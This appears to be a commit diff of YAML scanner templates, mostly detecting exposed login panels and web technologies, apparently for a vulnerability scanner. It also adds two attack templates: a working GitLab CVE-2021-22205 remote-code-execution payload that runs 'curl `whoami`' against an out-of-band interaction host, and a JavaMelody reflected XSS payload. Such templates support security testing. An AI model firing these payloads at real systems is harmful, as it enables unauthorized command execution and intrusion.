- "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')"
negative: true

33
exposed-panels/alfresco-detect.yaml Normal file
View File

@ -0,0 +1,33 @@
id: alfresco-detect
info:
name: Alfresco CMS Detection
author: pathtaga
severity: info
tags: alfresco,tech,panel
requests:
- method: GET
path:
- "{{BaseURL}}/alfresco/api/-default-/public/cmis/versions/1.1/atom"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'org\/alfresco\/api\/opencmis\/OpenCMIS.get'
- type: word
part: header
words:
- "application/json"
extractors:
- type: regex
part: body
group: 1
regex:
- 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)'
- 'Community v.*([0-9]\.[0-9]+\.[0-9]+)'
- 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)'

28
exposed-panels/bigbluebutton-login.yaml Normal file
View File

@ -0,0 +1,28 @@
id: bigbluebutton-login
info:
name: BigBlueButton Login Panel
author: myztique
severity: info
reference: https://github.com/bigbluebutton/greenlight
tags: panel,bigbluebutton
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'content="BigBlueButton'
extractors:
- type: regex
part: body
name: version
group: 1
regex:
- 'Greenlight<\/a>\. (.*)'

40
exposed-panels/projectsend-login.yaml Normal file
View File

@ -0,0 +1,40 @@
id: projectsend-login
info:
name: ProjectSend login panel
author: idealphase
severity: info
reference:
- https://www.exploit-db.com/ghdb/7380
- https://github.com/projectsend/projectsend
metadata:
google-dork: intext:Provided by ProjectSend
tags: panel,projectsend
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'Provided by <a href="https?:\/\/www\.projectsend\.org\/" target="_blank">ProjectSend<\/a>'
- type: word
part: body
words:
- 'id="login_form"'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "version (.*) - Free software"

33
exposed-panels/strapi-documentation.yaml Normal file
View File

@ -0,0 +1,33 @@
id: strapi-documentation
info:
name: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public)
author: idealphase
severity: info
tags: strapi,panel
requests:
- method: GET
path:
- '{{BaseURL}}/documentation'
- '{{BaseURL}}/documentation/login'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "x-strapi-config"
- "https://strapi.io/documentation/"
condition: or
- type: word
words:
- "<title>Swagger UI</title>"
- "<title>Login - Documentation</title>"
condition: or
- type: status
status:
- 200

20
exposed-panels/versa-sdwan.yaml Normal file
View File

@ -0,0 +1,20 @@
id: versa-sdwan
info:
name: Versa Networks SD-WAN Application
author: pdteam
severity: info
tags: panel,versa,sdwan
requests:
- method: GET
path:
- "{{BaseURL}}/versa/login.html"
redirects: true
max-redirects: 2
matchers:
- type: word
words:
- "Versa Networks"

2
exposures/configs/awstats-config.yaml
View File

@ -4,7 +4,7 @@ info:
name: AWStats config
author: sheikhrishad
severity: info
tags: config,exposure
tags: config,exposure,awstats
requests:
- method: GET

4
exposures/configs/awstats-script.yaml
View File

@ -4,7 +4,7 @@ info:
name: AWStats script
author: sheikhrishad
severity: info
tags: config,exposure
tags: config,exposure,awstats
requests:
- method: GET
@ -20,9 +20,9 @@ requests:
- "Do not remove this line"
- type: word
part: header
words:
- "application/x-perl"
part: header
- type: status
status:

10
misconfiguration/proxy/open-proxy-portscan.yaml
View File

@ -3,7 +3,7 @@ id: open-proxy-portscan
info:
name: Open Proxy to Ports on the Proxy's localhost Interface
author: sullo
severity: High
severity: high
tags: exposure,config,proxy,misconfig,fuzz
description: The host is configured as a proxy which allows access to its internal interface
remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports.
@ -56,7 +56,9 @@ requests:
- type: dsl
condition: or
dsl:
- (!regex("(?i)FTP",body_1)) && (!regex("(?i)FTP",body_2)) && (regex("(?i)FTP\b",body_3))
- (!regex("(?i)SSH-[\d.]+-\w+",body_1)) && (!regex("(?i)SSH-[\d.]+-\w+",body_2)) && (regex("(?i)SSH-[\d.]+-\w+",body_4))
- (!regex("(?i)POP3",body_1)) && (!regex("(?i)POP3",body_2)) && (regex("(?i)POP3\b",body_6))
- (!regex("(?i)FTP",body_1)) && (!regex("(?i)FTP",body_2)) && (regex("(?i)FTP",body_3))
- (!regex("(?i)SSH-[.]+-+",body_1)) && (!regex("(?i)SSH-[.]+-+",body_2)) && (regex("(?i)SSH-[.]+-+",body_4))
- (!regex("(?i)POP3",body_1)) && (!regex("(?i)POP3",body_2)) && (regex("(?i)POP3",body_6))
- (!regex("(?i)SMTP",body_1)) && (!regex("(?i)SMTP",body_2)) && ((regex("(?i)SMTP",body_5)) || (regex("(?i)SMTP",body_7)) || (regex("(?i)SMTP",body_8)))
# Updated by Chris on 2022/01/21

6
misconfiguration/unauthenticated-zippkin.yaml → misconfiguration/unauthenticated-zipkin.yaml
View File

@ -1,10 +1,10 @@
id: unauthenticated-zippkin
id: unauthenticated-zipkin
info:
name: Unauthenticated Zippkin
name: Unauthenticated Zipkin
author: dhiyaneshDk
severity: high
description: Unauthenticated access to Zippkin
description: Unauthenticated access to Zipkin
tags: unauth
requests:

25
technologies/airtame-device-detect.yaml Normal file
View File

@ -0,0 +1,25 @@
id: airtame-device-detect
info:
name: Airtame Device Detect
author: princechaddha
severity: info
tags: tech,airtame,iot
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "To access the settings of your Airtame"
- "https://airtame.com/download"
condition: and
- type: status
status:
- 200

35
technologies/gnuboard-detect.yaml Normal file
View File

@ -0,0 +1,35 @@
id: gnuboard-detect
info:
name: Gnuboard CMS Detect
author: gy741
severity: info
description: Detects Gnuboard CMS
reference: https://sir.kr/
tags: tech,gnuboard
requests:
- method: GET
path:
- "{{BaseURL}}/LICENSE.txt"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'GNU Board'
- 'http://sir.kr'
condition: and
- type: word
part: header
words:
- 'text/plain'
extractors:
- type: regex
part: body
group: 1
regex:
- '\( GNU Board (.*) \)'

24
technologies/interactsh-server.yaml Normal file
View File

@ -0,0 +1,24 @@
id: interactsh-server
info:
name: Interactsh Server
author: pdteam
severity: info
tags: tech,interactsh
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "<h1> Interactsh Server </h1>"
extractors:
- type: regex
group: 1
regex:
- '<b>(.*)<\/b> server'
- 'from <b>(.*)<\/b>'

30
technologies/lexmark-detect.yaml Normal file
View File

@ -0,0 +1,30 @@
id: lexmark-detect
info:
name: Lexmark Device Detect
author: princechaddha
severity: info
tags: tech,airtame,printer
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "<title>Lexmark (.*)</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "<title>Lexmark (.*)</title>"

35
technologies/projectsend-detect.yaml Normal file
View File

@ -0,0 +1,35 @@
id: projectsend-detect
info:
name: ProjectSend Detect
author: idealphase
severity: info
reference:
- https://www.exploit-db.com/ghdb/7380
- https://github.com/projectsend/projectsend
metadata:
google-dork: intext:Provided by ProjectSend
tags: tech,projectsend
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'Provided by <a href="https?:\/\/www\.projectsend\.org\/" target="_blank">ProjectSend<\/a>'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "version (.*) - Free software"

63
vulnerabilities/gitlab/gitlab-rce.yaml Normal file
View File

@ -0,0 +1,63 @@
id: gitlab-rce
info:
name: GitLab CE/EE Unauthenticated RCE using ExifTool
author: pdteam
severity: critical
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
reference:
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.90
cve-id: CVE-2021-22205
cwe-id: CWE-20
tags: cve,cve2021,gitlab,rce,oast,intrusive
requests:
- raw:
- |
GET /users/sign_in HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /uploads/user HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: {{csrf-token}}
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- 'Failed to process image'
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: status
status:
- 422
extractors:
- type: regex
name: csrf-token
internal: true
group: 1
regex:
- 'csrf-token" content="(.*?)" />\n\n<meta'
- type: regex
name: whoami
part: interactsh_request
group: 1
regex:
- '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'

31
vulnerabilities/other/java-melody-xss.yaml Normal file
View File

@ -0,0 +1,31 @@
id: java-melody-xss
info:
name: JavaMelody Monitoring XSS
author: kailashbohara
severity: medium
description: Reflected cross site scripting (XSS) in JavaMelody monitoring.
reference:
- https://github.com/Hurdano/JavaMelody-XSS
- https://github.com/javamelody/javamelody/pull/555
tags: xss,javamelody
requests:
- method: GET
path:
- '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200